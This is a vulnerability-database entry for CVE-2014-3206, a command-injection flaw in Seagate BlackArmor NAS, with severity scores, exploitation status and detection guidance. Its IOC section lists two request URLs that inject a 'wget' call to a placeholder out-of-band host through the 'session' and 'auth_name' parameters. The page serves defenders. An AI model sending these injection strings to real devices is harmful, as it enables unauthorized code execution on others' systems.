cbcvebase.
CVE-2014-3206
published 2018-02-23

CVE-2014-3206: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name…

PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
52.89%
98.8th percentile
Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.

Detection & IOCsextracted from sources · hover to see the quote

url/backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}};
url/backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}};
path/backupmgt/localJob.php
path/backupmgt/pre_connect_check.php
  • Monitor HTTP GET requests to /backupmgt/localJob.php with a 'session' parameter containing shell metacharacters (e.g., semicolons) indicating command injection attempts.
  • Monitor HTTP GET requests to /backupmgt/pre_connect_check.php with an 'auth_name' parameter containing shell metacharacters (e.g., semicolons) indicating command injection attempts.
  • GreyNoise tags IPs exploiting this CVE as 'Seagate BlackArmor RCE Attempt' with Malicious intention; cross-reference inbound traffic to BlackArmor NAS devices against GreyNoise threat feeds.
  • The exploit uses a max of 2 HTTP requests targeting both vulnerable endpoints; detection logic should alert on either path being accessed with injection characters in query parameters.
  • ·The NVD entry lists the second vulnerable path as 'localhost/backupmgmt/pre_connect_check.php' (with a 't' at the end of 'backupmgmt'), while the Nuclei template uses '/backupmgt/pre_connect_check.php' (without the 't'). Detections should cover both path variants.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.